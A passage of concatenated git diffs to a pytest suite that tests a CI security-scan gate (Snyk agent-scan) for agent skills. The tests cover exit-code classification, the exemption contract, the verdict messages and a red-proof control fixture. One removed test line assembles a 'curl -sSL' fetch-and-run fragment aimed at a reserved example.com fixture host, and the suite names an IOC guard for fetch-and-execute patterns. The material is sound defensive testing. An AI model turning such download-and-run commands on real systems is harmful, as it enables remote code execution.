+    `--ci` returns 1 for an unignored E-class finding AND for the scanner's own
+    X-class runtime failure, which this gate deliberately does not ignore (a scan
+    that broke is not a scan that passed — the workflow says so itself). A
+    classifier that maps every exit 1 to "critical finding" therefore leaves the
+    original false verdict reachable through a narrower door: the build would
+    announce a security finding over a scan that fell over mid-run.
+
+    Caught by review on PR #78, after the first version of this fix classified
+    only usage errors and called every exit 1 a finding.
+    """
+    run = _gate_step(workflow)["run"]
+    assert "E[0-9]{3}" in run, "the gate no longer looks for an E-class code before calling it a finding"
+    assert "X[0-9]{3}" in run, "the gate no longer recognises an X-class runtime failure"
+    assert "scan_class=finding" in run and "scan_class=operational" in run, (
+        "the gate no longer publishes which class of exit 1 it saw")
+
+    verdict = next(s for s in workflow["jobs"]["scan"]["steps"]
+                   if s.get("name") == "Report the coverage gap")
+    assert "steps.gate.outputs.scan_class" in verdict["run"], (
+        "the verdict step branches on the raw exit code again, so an X-class "
+        "runtime failure is reported as a critical security finding")
+
+
+def test_an_unclassifiable_exit_one_is_never_called_a_finding(workflow: dict):
+    """When the scanner names neither class, the honest answer is 'unclassified'.
+
+    Guessing 'critical finding' on an exit this workflow cannot explain is exactly
+    the failure it spent five days committing. An unclassified exit still fails the
+    build — it is not a pass — it just does not claim to be a security result.
+    """
+    run = _gate_step(workflow)["run"]
+    assert "scan_class=indeterminate" in run, (
+        "the gate lost its unclassified branch, so an exit 1 naming no code falls "
+        "through to whichever label happens to be last")
+    assert "UNCLASSIFIED" in run

--- a/tests/test_registry_scan_workflow.py
+++ b/tests/test_registry_scan_workflow.py
@@ -714,13 +714,20 @@ def test_the_scanner_version_is_pinned(workflow: dict):
     just goes red and stays red. Pinning makes the next scanner upgrade a deliberate
     commit that can be reviewed and reverted.
     """
-    runs = [s["run"] for s in workflow["jobs"]["scan"]["steps"] if _invokes_scanner(s)]
-    assert runs, "no step invokes the scanner"
-    for run in runs:
+    steps = [s for s in workflow["jobs"]["scan"]["steps"] if _invokes_scanner(s)]
+    assert steps, "no step invokes the scanner"
+    for step in steps:
+        run = step["run"]
         assert "snyk-agent-scan@latest" not in run, (
             "the scanner is back on @latest — an upstream rename will redden this "
             "build again with no commit of ours")
-        assert "snyk-agent-scan==" in run, "the scanner invocation is not version-pinned"
+        invocations = re.findall(r"uvx\s+snyk-agent-scan(\S*)\s+scan\b", run)
+        assert invocations, "no scanner invocation found in a step that runs one"
+        for spec in invocations:
+            assert spec.startswith("=="), (
+                f"the scanner invocation is not version-pinned on the command line "
+                f"(found `uvx snyk-agent-scan{spec} scan`). A pin written in a comment "
+                f"above an unpinned invocation is not a pin.")
 
 
 def test_a_runtime_failure_is_not_reported_as_a_finding(workflow: dict):
@@ -1204,6 +1211,23 @@ def test_the_red_proof_fails_when_the_scanner_says_nothing(tmp_path):
     proc = _run_redprove(tmp_path, scanner_output="Scan complete. No risks.", scanner_exit=0)
     assert proc.returncode == 1, "a blind scanner passed the control"
     assert "NOT PROVEN" in proc.stdout + proc.stderr
+
+
+def test_the_red_proof_fails_when_the_scanner_exits_zero_on_the_fixture(tmp_path):
+    """Isolated from the anchor check: the scanner SAW the fixture and still exited 0.
+
+    A control that only asserts the anchor would pass this, and a scanner that reports a
+    risk without failing on it is a gate that cannot go red.
+    """
+    spec = importlib.util.spec_from_file_location("registry_scan_redprove", _REDPROVE)
+    module = importlib.util.module_from_spec(spec)
+    spec.loader.exec_module(module)
+    proc = _run_redprove(
+        tmp_path,
+        scanner_output=f"1 risk: Unverifiable URLs: {module.expected_evidence()}/install.sh",
+        scanner_exit=0)
+    assert proc.returncode == 1, "the scanner exited 0 on the violating fixture and the control passed"
+    assert "exited 0" in proc.stdout + proc.stderr
 
 
 def test_the_red_proof_fails_when_the_anchor_host_is_absent(tmp_path):

--- a/tests/test_registry_scan_workflow.py
+++ b/tests/test_registry_scan_workflow.py
@@ -23,11 +23,11 @@ import pathlib
 import os
 import re
 import subprocess
+import sys
 import tempfile
 from pathlib import Path
 
 import pytest
-import yaml
 
 yaml = pytest.importorskip("yaml")
 
@@ -36,21 +36,6 @@ _WORKFLOW = _REPO / ".github" / "workflows" / "registry-scan.yml"
 _CI_WORKFLOW = _REPO / ".github" / "workflows" / "ci.yml"
 _REDPROVE = _REPO / ".github" / "scripts" / "registry_scan_redprove.py"
 _REPORT = _REPO / ".github" / "scripts" / "registry_scan_report.py"
-
-# THE GATING RULE (owner ruling, 2026-08-10): the build fails on the critical class only —
-# Snyk Agent Scan's E-codes. Warning-class findings (W-codes) are surfaced on every run but
-# never block. The scanner has no severity threshold, so the rule is expressed by enumerating
-# the W class into --ignore-risks.
-#
-# This is every W-code published in the scanner's catalog:
-# https://github.com/snyk/agent-scan/blob/main/docs/issue-codes.md
-# Pinned so that a newly published W-code arrives as a conscious update here rather than as an
-# unexplained red build — and, far more importantly, so that no E-code can ever be slipped in.
-_PUBLISHED_WARNING_CODES = {
-    "W001", "W007", "W008", "W009", "W011", "W012", "W013", "W014",
-    "W015", "W016", "W017", "W018", "W019", "W020", "W021",
-}
-
 
 @pytest.fixture(scope="module")
 def workflow() -> dict:
@@ -188,30 +173,18 @@ def test_gate_uses_ci_flag(workflow: dict):
     _assert_unconditional(gate, "the gating scan")
 
 
-def test_unfiltered_pass_sees_what_the_printer_would_hide(workflow: dict):
-    """The visibility pass emits JSON, which is strictly more complete than the report.
+def test_the_gating_pass_logs_what_it_did(workflow: dict):
+    """`--verbose` on the gating pass, so gate-output.txt records the run.
 
-    The scanner's printer strips the codes W003-W006 from the result as it prints — and
-    mutates the result in place doing it. JSON output skips the printer entirely, so the
-    one pass that is supposed to see everything actually does. (The gating pass keeps
-    `--verbose`, which is the same defect's off-switch on the report path.)
+    Not for the reason an earlier revision of this test gave: in 0.6.0 `--verbose` only
+    raises the logging level (`setup_logging`), and the printer neither strips codes nor
+    mutates the response. It is pinned because the gate CLASSIFIES on that captured
+    output, and a silent run gives the classifier nothing to read.
     """
-    assert "--json" in _visibility_step(workflow)["run"], (
-        "the unfiltered pass must emit JSON: it is the input to the annotation, summary, "
-        "and artifact surfaces, and it is the only output the printer cannot silently trim"
-    )
     assert "--verbose" in _gate_step(workflow)["run"], (
-        "the gating pass lost --verbose, so the scanner drops W003-W006 from the result "
-        "the --ci exit check reads"
+        "the gating pass lost `--verbose`, so the output the classifier greps is thinner "
+        "than the one those branches were written against"
     )
-
-
-def _declared_ignored_codes(workflow: dict) -> set:
-    return {
-        code.strip()
-        for code in workflow["env"]["the non-blocking risk list"].split(",")
-        if code.strip()
-    }
 
 
 def test_warnings_are_surfaced_on_all_three_channels(workflow: dict):
@@ -551,7 +524,9 @@ def _load_report_module():
 
 # Scanner 0.6.0's real shape, taken from a live artifact: one top-level key whose value
 # is a LIST of scanned paths, each carrying skills, each carrying risks keyed by name.
-# A risk that did not fire is present as null rather than absent.
+# A risk that did not fire is ABSENT: the scanner serialises with `exclude_none=True`.
+# `ci-secure` below carries no `malicious_code` key at all, which is the real shape;
+# `ci-speedup` carries an explicit null, which the reader tolerates but never sees live.
 _SAMPLE_SCAN = {
     "scan_path_responses": [
         {
@@ -683,11 +658,19 @@ def test_redprove_builds_a_violating_skill_without_committing_one(tmp_path):
             f"fixture URL host {host!r} is outside the reserved example.com domain"
         )
 
-    # The assembled string must not appear verbatim in the script that assembles it.
-    marker = "curl -sSL http" + "s://get.redprove-fixture.example.com"
-    assert marker not in _REDPROVE.read_text(encoding="utf-8"), (
-        "the red-proof script now contains the literal it is supposed to construct"
-    )
+    # The assembled string must not appear verbatim in the script that assembles it —
+    # asserted with the SHIPPED guard's own patterns rather than a hand-built substring,
+    # which would silently stop matching if the fixture's flags ever changed.
+    ioc_spec = importlib.util.spec_from_file_location(
+        "test_no_ioc_shaped_literals", _REPO / "tests" / "test_no_ioc_shaped_literals.py")
+    ioc = importlib.util.module_from_spec(ioc_spec)
+    ioc_spec.loader.exec_module(ioc)
+    source = _REDPROVE.read_text(encoding="utf-8")
+    for name in ("_FETCH_AND_EXECUTE", "_SCRIPT_URL", "_URL"):
+        assert not re.search(getattr(ioc, name), source), (
+            f"the red-proof script now contains a literal matching the shipped IOC guard's "
+            f"{name}; it is supposed to construct that string at runtime, never carry it"
+        )
 
 
 def test_a_scan_that_could_not_run_is_never_reported_as_a_finding(workflow: dict):
@@ -731,8 +714,7 @@ def test_the_scanner_version_is_pinned(workflow: dict):
     just goes red and stays red. Pinning makes the next scanner upgrade a deliberate
     commit that can be reviewed and reverted.
     """
-    runs = [s["run"] for s in workflow["jobs"]["scan"]["steps"]
-            if "snyk-agent-scan" in s.get("run", "")]
+    runs = [s["run"] for s in workflow["jobs"]["scan"]["steps"] if _invokes_scanner(s)]
     assert runs, "no step invokes the scanner"
     for run in runs:
         assert "snyk-agent-scan@latest" not in run, (
@@ -828,7 +810,9 @@ def test_the_redprove_anchor_is_falsifiable_and_is_what_the_fixture_contains():
         "the red-proof still USES the retired E005 code, not just mentions it")
 
 
-def _run_gate_classifier(workflow: dict, scanner_output: str, exit_code: int, tmp_path):
+def _run_gate_classifier(workflow: dict, scanner_output: str, exit_code: int, tmp_path,
+                         *, ignored_stdout: str = "third_party_content_exposure",
+                         ignored_exit: int = 0):
     """Execute the gate step's real shell against a fake scanner, and report its verdict.
 
     The other guards in this file are substring greps over the workflow YAML. Review of
@@ -852,13 +836,13 @@ def _run_gate_classifier(workflow: dict, scanner_output: str, exit_code: int, tm
     # The step calls `python .github/scripts/registry_scan_ignored.py`; stub that too so
     # the shell runs without the repo layout.
     py = tmp_path / "python"
-    py.write_text("#!/bin/sh\necho third_party_content_exposure\n", encoding="utf-8")
+    py.write_text(f"#!/bin/sh\necho '{ignored_stdout}'\nexit {ignored_exit}\n", encoding="utf-8")
     py.chmod(0o755)
 
     out_file = tmp_path / "gh_output"
     out_file.touch()
     proc = subprocess.run(
-        ["bash", "-c", run],
+        ["bash", "--noprofile", "--norc", "-e", "-o", "pipefail", "-c", run],
         cwd=tmp_path,
         capture_output=True,
         text=True,
@@ -913,3 +897,340 @@ def test_the_gate_shell_refuses_to_guess_on_an_unnamed_exit(tmp_path):
     proc, outputs = _run_gate_classifier(workflow, "something unexpected happened", 1, tmp_path)
     assert outputs.get("scan_class") == "indeterminate"
     assert proc.returncode == 1
+
+
+# ---------------------------------------------------------------------------
+# Round-2 review: the properties that were still only grepped, or not checked at
+# all. Each behavioural test below was written against the unfixed code and
+# watched fail; each guard was proven by mutating the code it protects.
+# ---------------------------------------------------------------------------
+
+
+def _load_contract_module():
+    spec = importlib.util.spec_from_file_location(
+        "registry_scan_contract", _REPO / ".github" / "scripts" / "registry_scan_contract.py")
+    module = importlib.util.module_from_spec(spec)
+    spec.loader.exec_module(module)
+    return module
+
+
+def _run_verdict_shell(workflow: dict, tmp_path, *, red_proof: str, gate: str,
+                       scan_class: str = "", scan_exit: str = ""):
+    """Execute the verdict step's real shell with the step-context values substituted.
+
+    The gate step got an execution harness this round; this step — the one that
+    actually prints `DID NOT RUN — NOT A FINDING` — did not, so every one of its five
+    branches was pinned only by substring greps. Inverting its finding test to put the
+    NOT A FINDING banner over a real critical left all tests green.
+    """
+    run = _enforcement_step(workflow)["run"]
+    for expr, value in (
+        ("steps.red_proof.outcome", red_proof),
+        ("steps.gate.outcome", gate),
+        ("steps.gate.outputs.scan_class", scan_class),
+        ("steps.gate.outputs.scan_exit", scan_exit),
+    ):
+        run = re.sub(r"\$\{\{\s*" + re.escape(expr) + r"\s*\}\}", value, run)
+    assert "${{" not in run, f"unsubstituted step expression left in the verdict shell: {run}"
+    summary = tmp_path / "step_summary"
+    summary.touch()
+    proc = subprocess.run(
+        ["bash", "--noprofile", "--norc", "-e", "-o", "pipefail", "-c", run],
+        cwd=tmp_path, capture_output=True, text=True,
+        env={"PATH": os.environ["PATH"], "SCAN_PATH": "skills",
+             "GITHUB_STEP_SUMMARY": str(summary), "HOME": str(tmp_path)},
+    )
+    return proc, summary.read_text(encoding="utf-8")
+
+
+def test_the_verdict_shell_never_labels_a_real_finding_not_a_finding(workflow, tmp_path):
+    """Executed, not grepped. This is the bug the whole PR exists to remove."""
+    proc, summary = _run_verdict_shell(
+        workflow, tmp_path, red_proof="failure", gate="failure", scan_class="finding", scan_exit="1")
+    assert "NOT A FINDING" not in proc.stdout + summary, (
+        "a run whose gate reported a blocking risk was announced as NOT A FINDING")
+    assert proc.returncode == 1
+
+
+def test_the_verdict_shell_reports_a_gate_that_never_ran(workflow, tmp_path):
+    """A passing control must not certify a run whose gate was skipped.
+
+    `Surface findings` is not continue-on-error, so unreadable scan output fails it and
+    leaves the gate unrun. The verdict step's own comment describes exactly this case —
+    and its early `exit 0` on a passing control made that branch unreachable, so the run
+    was announced "meaningful" with nothing gated.
+    """
+    proc, _ = _run_verdict_shell(workflow, tmp_path, red_proof="success", gate="skipped")
+    assert proc.returncode == 1, (
+        f"a skipped gate was certified as a meaningful run: {proc.stdout!r}")
+    assert "DID NOT RUN" in proc.stdout
+
+
+def test_the_verdict_shell_certifies_a_healthy_run(workflow, tmp_path):
+    proc, _ = _run_verdict_shell(
+        workflow, tmp_path, red_proof="success", gate="success", scan_class="clean", scan_exit="0")
+    assert proc.returncode == 0
+
+
+def test_the_verdict_shell_reports_the_coverage_gap_on_a_blind_scanner(workflow, tmp_path):
+    proc, _ = _run_verdict_shell(
+        workflow, tmp_path, red_proof="failure", gate="success", scan_class="clean", scan_exit="0")
+    assert proc.returncode == 1
+    assert "COVERAGE GAP" in proc.stdout and "NOT A FINDING" in proc.stdout
+
+
+def test_the_gate_shell_does_not_mistake_scanned_prose_for_a_finding(tmp_path):
+    """`risks found` must be read off the scanner's verdict line, not the whole log.
+
+    The gate captures the scanner's `--verbose` output, which echoes the description and
+    evidence text of the skills being scanned. These are CI-security skills, so the
+    phrase is ordinary prose for them. An unanchored grep let that prose classify a
+    crashed scan as a security finding — the same false verdict, sourced from the tree
+    instead of from the scanner.
+    """
+    workflow = yaml.safe_load(_WORKFLOW.read_text(encoding="utf-8"))
+    proc, outputs = _run_gate_classifier(
+        workflow,
+        "Scanning skills\n"
+        "└── ci-secure 0 risks\n"
+        "    description: Reports the risks found in a repository's workflows.\n"
+        "CI (--ci): exiting with code 1 (runtime failure codes: X003).",
+        1, tmp_path)
+    assert outputs.get("scan_class") == "operational", (
+        f"scanned skill prose classified a crashed scan as {outputs.get('scan_class')!r}")
+
+
+def test_a_blocking_finding_is_annotated_on_the_checks_tab(tmp_path):
+    """The finding branch was the only failure state emitting no titled annotation.
+
+    The reporter deliberately leaves blocking risks to the gate, and the gate emitted a
+    plain `echo` — so the one run a review agent most needs to read through the checks
+    API had an empty annotation set.
+    """
+    workflow = yaml.safe_load(_WORKFLOW.read_text(encoding="utf-8"))
+    proc, outputs = _run_gate_classifier(
+        workflow, "CI (--ci): exiting with code 1 (risks found).", 1, tmp_path)
+    assert outputs.get("scan_class") == "finding"
+    assert "::error title=" in proc.stdout, "a blocking risk produced no checks-tab annotation"
+
+
+def test_the_exit_two_path_records_a_class(tmp_path):
+    """The verdict annotation renders `class <value>`; a blank one reads as a bug."""
+    workflow = yaml.safe_load(_WORKFLOW.read_text(encoding="utf-8"))
+    proc, outputs = _run_gate_classifier(workflow, "error: unrecognized arguments", 2, tmp_path)
+    assert outputs.get("scan_class"), "the exit-2 path left scan_class unset"
+    assert outputs["scan_class"] != "finding"
+    assert proc.returncode == 1
+
+
+def test_the_gate_fails_when_its_exemption_list_cannot_be_built(tmp_path):
+    """`--ignore-risks "$(python ...)"` swallowed the shim's failure.
+
+    A traceback from the shim became an empty argument, the scanner exempted nothing,
+    and the owner's ruling was silently off — on a tree with no risks, a green build.
+    """
+    workflow = yaml.safe_load(_WORKFLOW.read_text(encoding="utf-8"))
+    proc, outputs = _run_gate_classifier(
+        workflow, "no risks", 0, tmp_path, ignored_stdout="", ignored_exit=1)
+    assert proc.returncode != 0, "the gate ran with an empty exemption list instead of failing"
+    assert outputs.get("scan_class") != "clean"
+
+
+def test_a_retired_exemption_name_fails_the_gate(tmp_path):
+    """The scanner drops an unknown risk name with a yellow warning and exits 0.
+
+    That is exactly how the previous outage hid: fifteen `unknown failure code` lines on
+    a green build. If Snyk renames the one exempt risk, the exemption goes inert the same
+    silent way unless this build reads the warning.
+    """
+    workflow = yaml.safe_load(_WORKFLOW.read_text(encoding="utf-8"))
+    proc, _ = _run_gate_classifier(
+        workflow, "Warning: unknown risk name: third_party_content_exposure\nScan complete.",
+        0, tmp_path)
+    assert proc.returncode != 0, (
+        "the gate passed with an exemption name the scanner does not recognise")
+
+
+def test_the_gate_reads_its_exemption_list_from_the_shared_contract(workflow: dict):
+    """The gate must not restate the ruling inline.
+
+    An inline `--ignore-risks "third_party_content_exposure,suspicious_download_url"`
+    would exempt the very risk the red-proof anchors on, while the red-proof — which
+    reads the contract — stayed green. Drift between the two is the single thing
+    `registry_scan_contract.py` exists to prevent.
+    """
+    run = _gate_step(workflow)["run"]
+    assert "registry_scan_ignored.py" in run, (
+        "the gate no longer sources its exemption list from the shared contract shim")
+    contract = _load_contract_module()
+    for risk in contract.SKILL_RISKS + contract.SERVER_RISKS:
+        assert risk not in run, (
+            f"the gate names the risk {risk!r} inline; the ruling has exactly one home, "
+            f"in registry_scan_contract.py")
+
+
+def test_no_blocking_risk_is_ever_exempt():
+    """A blocking risk reaching the exemption list is a disarmed gate reporting green.
+
+    The runtime red-proof only anchors on the fixture's own risk, so widening the list to
+    swallow malicious code or secret detection is invisible to it. This is the offline
+    half, and it is the half that runs in the required `test` check.
+    """
+    contract = _load_contract_module()
+    assert contract.NON_BLOCKING_RISKS == ("third_party_content_exposure",), (
+        "the non-blocking list changed; exactly one risk is exempt by owner ruling "
+        "(2026-08-10, restated for 0.6.0 2026-08-26)")
+    for risk in ("suspicious_download_url", "malicious_code", "secret_detection",
+                 "prompt_injection_skill_instructions", "insecure_credential_handling",
+                 "unverifiable_dependencies", "direct_money_access",
+                 "modifying_system_services", "missing_skill_md"):
+        assert risk in contract.BLOCKING_RISKS, f"{risk} is no longer a blocking risk"
+
+
+def test_the_risk_vocabulary_matches_the_scanners_own_model():
+    """Pinned so a catalog change arrives as a conscious edit, not a silent exemption.
+
+    Verbatim from `SkillRiskIndexes` / `McpServerRiskIndexes` in the scanner's
+    `agent_scan/models/api/v20260710.py` at the pinned version.
+    """
+    contract = _load_contract_module()
+    assert contract.SKILL_RISKS == (
+        "prompt_injection_skill_instructions", "suspicious_download_url", "malicious_code",
+        "insecure_credential_handling", "secret_detection", "direct_money_access",
+        "third_party_content_exposure", "unverifiable_dependencies",
+        "modifying_system_services", "missing_skill_md")
+    assert contract.SERVER_RISKS == (
+        "dangerous_words", "prompt_injection_tool_desc", "untrusted_content",
+        "private_data", "destructive_capabilities")
+
+
+def test_the_exemption_shim_prints_exactly_the_contract_list():
+    """The one place a policy decision becomes a command-line argument, and it had no
+    coverage at all: hardcoding blocking risks into it kept every test green."""
+    proc = subprocess.run(
+        [sys.executable, str(_REPO / ".github" / "scripts" / "registry_scan_ignored.py")],
+        capture_output=True, text=True, check=True)
+    contract = _load_contract_module()
+    assert proc.stdout.strip() == ",".join(contract.NON_BLOCKING_RISKS)
+    assert proc.stdout.strip() == "third_party_content_exposure"
+
+
+def test_an_unrecognised_payload_shape_is_never_reported_as_clean(tmp_path, capsys):
+    """The reporter returning `[]` on a renamed shape is bug #3, left undefended.
+
+    0.5.x's shape produced exactly this: valid JSON, an empty finding list, "No
+    findings." on every run, and the UNREADABLE guard never firing. The next rename must
+    be loud.
+    """
+    module = _load_report_module()
+    findings = tmp_path / "findings.json"
+    findings.write_text(json.dumps({"results": {"skills": {"issues": []}}}), encoding="utf-8")
+    assert module.main(["report", str(findings)]) == 1
+    assert "UNREADABLE" in capsys.readouterr().err
+
+
+def test_a_server_risk_is_surfaced_like_a_skill_risk(tmp_path, capsys):
+    """The scanner's `--ci` exit weighs `server_risks` as well as `skill_risks`.
+
+    A server risk therefore fails the gate while the reporter printed "No findings." —
+    the same silent-surfacing failure this gate exists to remove, from the other side.
+    """
+    module = _load_report_module()
+    findings = tmp_path / "findings.json"
+    findings.write_text(json.dumps({"scan_path_responses": [{
+        "path": "skills",
+        "server_risks": [{"name": "some-mcp", "risk_indexes": {
+            "untrusted_content": {"score": 400, "evidence": "Reads untrusted content"}}}],
+        "skill_risks": [],
+    }]}), encoding="utf-8")
+    assert module.main(["report", str(findings)]) == 0
+    out = capsys.readouterr().out
+    assert "untrusted_content" in out and "No findings." not in out
+
+
+def test_a_scan_error_is_surfaced_rather_than_read_as_clean(tmp_path, capsys):
+    """A skill the scanner could not analyse is not a skill that came back clean."""
+    module = _load_report_module()
+    findings = tmp_path / "findings.json"
+    findings.write_text(json.dumps({"scan_path_responses": [{
+        "path": "skills",
+        "skill_risks": [{"name": "ci-secure", "risk_indexes": {},
+                         "error": {"code": "X002", "message": "skill scan failed"}}],
+    }]}), encoding="utf-8")
+    assert module.main(["report", str(findings)]) == 0
+    out = capsys.readouterr().out
+    assert "No findings." not in out, "a skill that failed to scan was reported as clean"
+    assert "ci-secure" in out
+
+
+def test_a_risk_the_contract_does_not_know_is_announced(tmp_path, capsys):
+    """The contract's comment promised this and nothing implemented it.
+
+    A risk name the vocabulary does not carry still blocks (it is not in the exemption
+    list), but nobody was told the catalog had moved — so the ten-name list, checked by
+    hand against the scanner's model, had no effect on anything.
+    """
+    module = _load_report_module()
+    findings = tmp_path / "findings.json"
+    findings.write_text(json.dumps({"scan_path_responses": [{
+        "path": "skills",
+        "skill_risks": [{"name": "ci-secure", "risk_indexes": {
+            "brand_new_risk_2027": {"score": 700, "evidence": "something new"}}}],
+    }]}), encoding="utf-8")
+    assert module.main(["report", str(findings)]) == 0
+    out = capsys.readouterr().out
+    assert "brand_new_risk_2027" in out
+    assert "UNKNOWN" in out.upper(), (
+        "a risk name outside the pinned vocabulary was surfaced as if it were known")
+
+
+def _run_redprove(tmp_path, *, scanner_output: str, scanner_exit: int):
+    """Drive the red-proof offline with a stub scanner on PATH.
+
+    `main()` was executed by nothing, so both of its failure conditions could be disabled
+    with the suite green — including the blind-scanner anchor its own comment says must
+    never be weakened.
+    """
+    stub = tmp_path / "uvx"
+    stub.write_text(f"#!/bin/sh\ncat <<'OUT'\n{scanner_output}\nOUT\nexit {scanner_exit}\n",
+                    encoding="utf-8")
+    stub.chmod(0o755)
+    return subprocess.run(
+        [sys.executable, str(_REDPROVE)], capture_output=True, text=True,
+        env={**os.environ, "PATH": f"{tmp_path}:{os.environ['PATH']}", "SNYK_TOKEN": "stub"})
+
+
+def test_the_red_proof_fails_when_the_scanner_says_nothing(tmp_path):
+    proc = _run_redprove(tmp_path, scanner_output="Scan complete. No risks.", scanner_exit=0)
+    assert proc.returncode == 1, "a blind scanner passed the control"
+    assert "NOT PROVEN" in proc.stdout + proc.stderr
+
+
+def test_the_red_proof_fails_when_the_anchor_host_is_absent(tmp_path):
+    """Non-zero exit alone is not proof the scanner saw OUR fixture."""
+    proc = _run_redprove(
+        tmp_path, scanner_output="CI (--ci): exiting with code 1 (risks found).", scanner_exit=1)
+    assert proc.returncode == 1, "the control passed without the scanner echoing the fixture host"
+    assert "NOT PROVEN" in proc.stdout + proc.stderr
+
+
+def test_the_red_proof_passes_only_on_a_scanner_that_saw_the_fixture(tmp_path):
+    spec = importlib.util.spec_from_file_location("registry_scan_redprove", _REDPROVE)
+    module = importlib.util.module_from_spec(spec)
+    spec.loader.exec_module(module)
+    proc = _run_redprove(
+        tmp_path,
+        scanner_output=f"1 risk: Unverifiable URLs: {module.expected_evidence()}/install.sh\n"
+                       "CI (--ci): exiting with code 1 (risks found).",
+        scanner_exit=1)
+    assert proc.returncode == 0, proc.stdout + proc.stderr
+
+
+def test_the_red_proof_runs_the_gates_own_exemption_list(tmp_path):
+    """Documented as load-bearing and guarded by nothing: deleting the two lines that
+    append `--ignore-risks` left every test green, and with them gone an exemption grown
+    to swallow the anchor would no longer fail here."""
+    proc = _run_redprove(tmp_path, scanner_output="Scan complete.", scanner_exit=0)
+    contract = _load_contract_module()
+    assert f"--ignore-risks {','.join(contract.NON_BLOCKING_RISKS)}" in proc.stdout, (
+        "the red-proof no longer runs the gate's real exemption list")

--- a/tests/test_registry_scan_workflow.py
+++ b/tests/test_registry_scan_workflow.py
@@ -34,7 +34,7 @@ _REPORT = _REPO / ".github" / "scripts" / "registry_scan_report.py"
 # THE GATING RULE (owner ruling, 2026-08-10): the build fails on the critical class only —
 # Snyk Agent Scan's E-codes. Warning-class findings (W-codes) are surfaced on every run but
 # never block. The scanner has no severity threshold, so the rule is expressed by enumerating
-# the W class into --ignore-issues-codes.
+# the W class into --ignore-failure-codes.
 #
 # This is every W-code published in the scanner's catalog:
 # https://github.com/snyk/agent-scan/blob/main/docs/issue-codes.md
@@ -90,7 +90,7 @@ def _gate_step(workflow: dict) -> dict:
     """
     steps = [
         step for step in _scan_job(workflow)["steps"]
-        if _invokes_scanner(step) and "--ignore-issues-codes" in step["run"]
+        if _invokes_scanner(step) and "--ignore-failure-codes" in step["run"]
     ]
     assert len(steps) == 1, (
         f"expected exactly one gating scanner invocation (the one passing the ignore "
@@ -103,7 +103,7 @@ def _visibility_step(workflow: dict) -> dict:
     """The unfiltered pass: a scanner invocation with no ignore list, distinct from the gate."""
     steps = [
         step for step in _scan_job(workflow)["steps"]
-        if _invokes_scanner(step) and "--ignore-issues-codes" not in step["run"]
+        if _invokes_scanner(step) and "--ignore-failure-codes" not in step["run"]
     ]
     assert len(steps) == 1, (
         f"expected exactly one unfiltered scanner invocation; found {len(steps)}. The "
@@ -183,16 +183,16 @@ def test_gate_uses_ci_flag(workflow: dict):
 
 
 def test_gate_spells_the_ignore_flag_the_way_the_scanner_does(workflow: dict):
-    """The flag is `--ignore-issues-codes` — plural "issues", singular "codes".
+    """The flag is `--ignore-failure-codes`, as of scanner 0.6.0.
 
-    It reads like a typo and has been "corrected" to `--ignore-issue-codes` in review.
-    It is not a typo: the scanner's own argument parser declares
-    `parser.add_argument("--ignore-issues-codes", ...)`, and the singular spelling is
-    rejected with `error: unrecognized arguments`. Getting it wrong does not degrade the
-    gate quietly — it exits on a usage error the first time it runs with a token, which
-    is a path no offline test can reach. Hence this assertion.
+    It was `--ignore-issues-codes` until the scanner renamed it, and because the
+    invocation was pinned to `@latest`, that rename landed here with no commit of ours
+    and reddened this build for five days (2026-08-20 → 2026-08-25). Getting it wrong
+    does not degrade the gate quietly — the scanner exits on a usage error the first
+    time it runs with a token, a path no offline test can reach, which is why the
+    spelling is asserted here and why the version is now pinned rather than floating.
     """
-    assert "--ignore-issues-codes" in _gate_step(workflow)["run"]
+    assert "--ignore-failure-codes" in _gate_step(workflow)["run"]
 
 
 def test_unfiltered_pass_sees_what_the_printer_would_hide(workflow: dict):
@@ -250,11 +250,11 @@ def test_ignore_list_is_exactly_the_published_warning_class(workflow: dict):
     )
 
     # The env var is only the declared list; what the gate actually suppresses is what it
-    # passes on the command line. An inline `--ignore-issues-codes "${IGNORED_ISSUE_CODES},E005"`
+    # passes on the command line. An inline `--ignore-failure-codes "${IGNORED_ISSUE_CODES},E005"`
     # would suppress the very rule the red-proof is anchored to while the check above stays
     # green, so pin that the flag's argument is the variable and nothing else.
     argument = re.search(
-        r'--ignore-issues-codes\s+"?([^"\n\\]*)"?', _gate_step(workflow)["run"]
+        r'--ignore-failure-codes\s+"?([^"\n\\]*)"?', _gate_step(workflow)["run"]
     )
     assert argument, "the gating scan no longer passes an ignore list"
     assert argument.group(1).strip() == "${IGNORED_ISSUE_CODES}", (
@@ -745,3 +745,54 @@ def test_redprove_builds_a_violating_skill_without_committing_one(tmp_path):
     assert marker not in _REDPROVE.read_text(encoding="utf-8"), (
         "the red-proof script now contains the literal it is supposed to construct"
     )
+
+
+def test_a_scan_that_could_not_run_is_never_reported_as_a_finding(workflow: dict):
+    """A crashed scanner and a real finding must not read the same.
+
+    The gate uses `--ci`, where exit 1 means "a finding is present" and exit 2 means
+    "I could not start" — a renamed flag, a missing token, an unparseable argument.
+    While both surfaced as a bare non-zero, the verdict step read either as a finding,
+    and this build spent five days announcing `The gate reported a critical finding in
+    skills` over a scan that never happened. That is worse than a plain failure: it
+    sends every reviewer hunting for a security issue that does not exist, and it hides
+    the real news, which is that the repo has no working registry scanning at all.
+
+    So the gate must capture the exit code and the verdict must branch on it.
+    """
+    gate = _gate_step(workflow)
+    run = gate["run"]
+    assert "scan_exit=" in run and "GITHUB_OUTPUT" in run, (
+        "the gate no longer publishes the scanner's exit code, so the verdict step "
+        "cannot tell a crash from a finding")
+    assert 'code}" -eq 1 ' in run or "code}\" -eq 1" in run, (
+        "the gate no longer treats exit 1 specifically as the finding case")
+
+    verdict = next(s for s in workflow["jobs"]["scan"]["steps"]
+                   if s.get("name") == "Report the coverage gap")
+    vrun = verdict["run"]
+    assert "steps.gate.outputs.scan_exit" in vrun, (
+        "the verdict step no longer reads the gate's exit code, so any non-zero exit "
+        "is reported as a critical finding again")
+    assert "DID NOT RUN — NOT A FINDING" in vrun, (
+        "the verdict step lost the branch that names a failed-to-start scan as a "
+        "coverage gap rather than a finding")
+
+
+def test_the_scanner_version_is_pinned(workflow: dict):
+    """`@latest` is why a vendor rename broke a green build with no commit of ours.
+
+    The weekly cron exists to catch RULE-catalog drift — a rule renamed or added
+    upstream that turns a shipped skill red on its own. It is not there to absorb
+    breaking CLI changes, and it cannot: a usage error is not a finding, so the cron
+    just goes red and stays red. Pinning makes the next scanner upgrade a deliberate
+    commit that can be reviewed and reverted.
+    """
+    runs = [s["run"] for s in workflow["jobs"]["scan"]["steps"]
+            if "snyk-agent-scan" in s.get("run", "")]
+    assert runs, "no step invokes the scanner"
+    for run in runs:
